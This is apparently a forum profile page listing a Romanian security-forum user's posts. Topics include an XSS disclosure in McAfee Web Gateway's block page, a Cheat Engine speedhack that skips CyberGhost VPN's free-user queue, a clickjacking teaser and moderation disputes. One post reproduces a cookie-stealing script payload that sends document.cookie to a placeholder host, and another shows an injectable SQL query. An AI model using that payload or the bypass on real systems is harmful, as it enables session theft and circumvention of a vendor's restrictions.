TheTime
-
Posts
1576 -
Joined
-
Last visited
-
Days Won
24
Posts posted by TheTime
-
-
Diploma are "valoare", in sensul ca anumiti oameni de la HR au auzit de cursuri si poate le captezi interesul. Dar tu pui problema gresit din 2 puncte de vedere:
1. Nu faci cursurile pentru valoarea diplomei, ci pentru cunostintele pe care le poti capata.
2. O conditie necesara pentru a putea lucra la o banca este sa ai cazierul curat. Dar te poti orienta catre alte companii.
Bafta!
-
Nu aduce nimic nou sub soare fata de sursele pe care le da. In plus, se bazeaza pe un mare if:
If the server displays verbose errors to client...Daca serverul arata erori kilometrice... ai noroc, ce sa zic. In cazul wordpress-ului, spre exemplu, mesajul de eroare contine (by default) doar vreo 15-20 caractere din entitatea inclusa. Deci nu poti sa extragi mare lucru error-based.
-
Salutare baieti,
Vreau sa va arat un XSS interesant.
Cand va conectati la internet de la scoala/facultate/cafenea/munca, este posibil ca traficul vostru sa fie filtrat si anumite adrese sa fie blocate. Exista mai multe solutii care fac filtrarea adreselor accesate pe baza categoriilor in care se incadreaza (porn, games, social networks, hacking). Una dintre aceste solutii este McAfee Web Gateway.
Atunci cand accesati o pagina care este blocata, apare un mesaj standard in care vi se spune ca site-ul x.com este blocat pentru ca... Exemplu: http://s28.postimg.org/pz7z1r6p9/Mc_Afee2.png
Dupa cum se poate vedea in imaginea de mai sus, adresa site-ului pe care incercati sa il vizitati este aruncata in pagina generata de McAfee Web Gateway, aparent intr-o maniera sigura (escaped & sh!t).
Observam 2 lucruri:
1. Desi continutul paginii este generat de McAfee Web Gateway, browserul il interpreteaza in ca fiind primit de la site-ul pe care incercati sa il vizitati (simple check: tastati in consola javascript "document.domain");
2. Printre headerele primite se numara si "Content-Type:text/html", dar observam ca charset-ul nu este mentionat, deci putem injecta unicode chars! ^ ^
Fara prea multe alte comentarii, PoC: http://s27.postimg.org/43vm4vys3/Mc_Afee1.png
Dupa cum se vede, javascriptul este interpretat in security-context-ul siteului vizitat. Deci McAfee Web Gateway introduce o vulnerabilitate de tipul XSS in toate site-urile pe care le blocheaza. Nice!
Daca aveti timp, puteti sa il raportati catre cei de la McAfee. Stay safe!
-
1
-
-
Voi ce p?rere ave?i? Primeaz? dreptul statului de a controla mesajele schimbate între cet??eni pentru a combate terorismul sau cet??enii s? aib? dreptul s? foloseasc? orice encrip?ie vor?
Asta e o dezbatere fara sfarsit. Normal ca toti ne dormi intimitate pana-n panzele albe si vrem ca statul sa stea departe de orice bit de informatie ce ne apartine. Asta pana cand noi (sau cineva drag noua) ajungem sa fim victimele terorismului. Atunci ne vom dori si mai mult sa stea departe de informatiile noastre, sa plateasca pentru incompetenta de care au dat dovada cand nu au reusit sa impiedice evenimentul si sa le impiedice pe urmatoarele. Mindfuck.
-
Eu te-as incuraja sa inveti Prolog, mai apoi Haskell si sa le folosesti pe fiecare atunci cand se pliaza mai bine pe necesitatile tale.
Prolog-ul e genial pentru ca te lasa sa te exprimi in limbaj "natural", poti transforma foarte usor logica pura in inteligenta artificiala. Nu e greu de invatat, dar e altceva fata de c/c++. E mai usor sa il inveti daca uiti tot ceea ce stii despre programare si o iei de la 0, ca un copil (exista studii care arata ca un copil invata mai rapid Prolog decat C, tocmai datorita faptului ca e mai apropiat de felul in care gandim).
Nu sunt de acord cu ce spun colegii mai sus (sa folosesti C/C++ pentru plusul de performanta). Daca argumentul lor ar fi suficient de bun, acum toti am folosi doar limbaje de asamblare si ne-am simti vinovati pentru ca nu scriem direct cod masina.
-
Sursa: razvan1@hy or older or older or older
You might get the point.
-
Am intrat la @the.fish3r.
Pana atunci, haideti sa pastram putina curatenie aici.
-
Ma uit acum peste extras. Revin...
-
@Hoster.ro <=> Cosmin Alexandru <=> tepar
-
1
-
-
@the.fish3r
Anunta-ma cand ii inapoiezi banii.
Restul: daca nu sunteti implicati in poveste, poate ar fi bine sa nu mai postati. Devine greu de urmarit topicul.
-
1
-
-
@the.fish3r
Am 2 intrebari:
1. Va arde de glume de 1 aprilie?
2. I-ai dat omului banii inapoi?
-
Cea mai buna cale de a invata JavaScript este sa inveti cand sa NU folosesti Javascript.
Sunt foarte multi programatori web si incearca sa programeze pe orice platforma, pornind de la ideea ca exista peste tot controale de tip webview. (ex: aplicatiile facute cu PhoneGap pentru dispozitive mobile).
-
Mai crede cineva ca astia 2 ar trebui banati o vreme? E doar o parere personala sau ei sunt responsabili pentru o buna parte din circul de pe forum?
-
Baiatu asta are nevoie de un ban, il ajutati voi?
Salut,
Pare ca omul a dat manual dislike-urile. Ar trebui sa te simti bine, are suficient interes pentru tine incat sa iti ia posturile la mana... e ceva. Dar nu e ceva pentru care sa ii pot da ban.
Ii las pe Gecko si Worm64 sa rezolve situatia!
-
Salutare,
Fara suparare, dar tu nu reprezinti RST-ul si nici nu ai dreptul sa alegi cine-l conduce. RST-ul nu e democratie, dar nici macar in democratie referendumurile nu sunt initiate de... cei ca tine.
Fa-ti o favoare si daca forumul spune ca esti beat, du-te si te culca.
-
E de cacat cybershit, folositi insorg.org
De ce? Ce au ei in plus? N-as vrea ca topicul sa devina ring de dans pentru fanaticii anumitor solutii VPN.
-
Salutare baieti,
Am vazut ca unii dintre voi folositi CyberGhost VPN si probabil nu toti aveti cont premium. Deci trebuie sa asteptati cateva minute bune pana sa va conectati la un server sau pana sa schimbati serverul.
CyberComunism, trebuie sa asteptam la cozi virtuale?!? Ummm... Let's hack this!
Ideea de la care plecam este simpla: vrem ca timpul de asteptare sa se scurga mai rapid, instant daca se poate. Un fel de "speedhack". Putem sa ne punem ideea in aplicare folosind Cheat Engine. Intrati pe pagina lor (click me), descarcati si instalati programul.
Pasi de urmat:
1. Deschideti clientul de VPN si conectati-va la serverul ales. Ar trebui sa va apara o fereastra pop-up (similara cu cea din poza de mai sus).
2. Deschideti Cheat Engine si apasati pe iconita din stanga-sus pentru a va atasa unui proces. (picture)
3. Dati click pe butonul "Window list" pentru a selecta din lista de ferestre deschise, selectati fereastra cu titlul "Just a few secunds...", apoi click pe butonul "Open".
4. In Cheat Engine, bifati "Enable Speedhack", scrieti o valoare mai mare in textbox (100 inseamna ca se va misca de 100 de ori mai rapid, just pick a number) si apasati butonul "Apply".
Felicitari! Acum coada se va scurge in cateva secunde! Dupa ce termina coada, debifati "Enable Speedhack" si bucurati-va de VPN.
Cateva idei de meditatie:
1. Coada de asteptare nu este facuta pentru ca sunt ocupate locurile pe server, ci pentru ca se doreste ca utilizatorul sa aiba o experienta mult mai buna cu varianta premium decat cu cea free. Astfel, se creaza probleme artificiale pentru utilizatorul free, in loc sa se implementeze functionalitati aditionale pentru utilizatorul premium. Urata abordare!
2. Daca cei de la CyberGhost mint in legatura cu motivul pentru care exista coada, credeti ca se tin de cuvant atunci cand vine vorba de politica lor de pastrare a logurilor? Aveti grija pentru ce le folositi VPN-ul, s-ar putea sa nu fiti chiar atat de anonimi pe cat vi se spune.
3. Asa cum pe web este o idee proasta sa faci validarea parolei de autentificare in javascript (client-side), tot asa este o idee proasta ca un client desktop sa fie responsabil cu un mecanism de delay ce ar trebui implementat pe server.
Stay safe!
-
1
-
-
<script>a=new Image();a.src="http://sitetau.com/exploit.php?cookie="+document.cookie;</script>
ar trebui shimbat in
<script>a=new Image();a.src="http://sitetau.com/exploit.php?cookie="+encodeURIComponent(document.cookie);</script>
-
NU!
Pune mana si fa ceva util, lasa prostiile astea!
-
Pentru 7.2 nu cred ca ai nimic. Pentru 7.1, torrent.
-
Ma bucur sa vad cateva linii de cod, mi-ai facut duminica mai frumoasa!
Ai un xss permanent in loguri, nu filtrezi deloc cookie-urile primite. Daca vrei sa folosesti pe bune scriptul, exista sanse ca altii sa incerce sa afle cine esti. Daca scriptul tau e vulnerabil, you're gonna have a bad time!
Si pune o parola pentru accesarea logurilor.
-
In loc sa faci pe desteptul intr-un topic in care nu te baga nimeni in seama, ai putea sa faci tu ceva util.
Din exterior, povestea se vede cam asa: ei nu au reusit sa faca nimic, dar au incercat sa faca ceva; tu nu faci nimic, dar vrei sa "le arati tu lor". Pe scurt, niste nulitati simpatice se cearta...
Vino tu cu proiectul tau, fa-ti o pagina de "under construction", un plan cu obiective, timeline si buget, pune-l in aplicare si apoi povestea va fi alta: "eu am incercat si am facut asta, voi ati incercat si nu ati reusit nimic".
Ai mai putea sa-ti lucrezi putin si gramatica, e destul de greu sa fii luat in serios (indiferent cate de bune ar fi argumentele expuse) daca nu faci diferenta intre "sa" si "s-a". Si nu mai face posturi duble!
Inclid topicul. Daca cineva considera ca subiectul initial are un viitor, sa-mi dea un PM si il redeschid.
-
Clickjacking, the art of tricking users into clicking on links or buttons that no sane person would ever click on. But how much damage can you do by stealing a few clicks? We are in 2015, we might think that this kind of vulnerabilities would have been solved by now. But that’s not the case.
Firefox Hello
Recently Mozilla launched Firefox Hello, their free service for video and voice conversations online. After a few tests, I noticed that hello.firefox.com website does not prevent framing.
Full story here.
-
Eu, acum 4 luni. E vorba de cateva erori SQL si ceva info disclosure. Nimic exploatabil, nimic foarte grav. Mi-au multumit, m-au pus in HoF, dar n-au mai zis nimic de atunci si nu au reparat. Status: Triaged (Open)
Problema PHP+MySQL
in Programare
Posted
$query = mysql_query("UPDATE users SET email = '".$email."' WHERE userid = '".$email."'");Read me!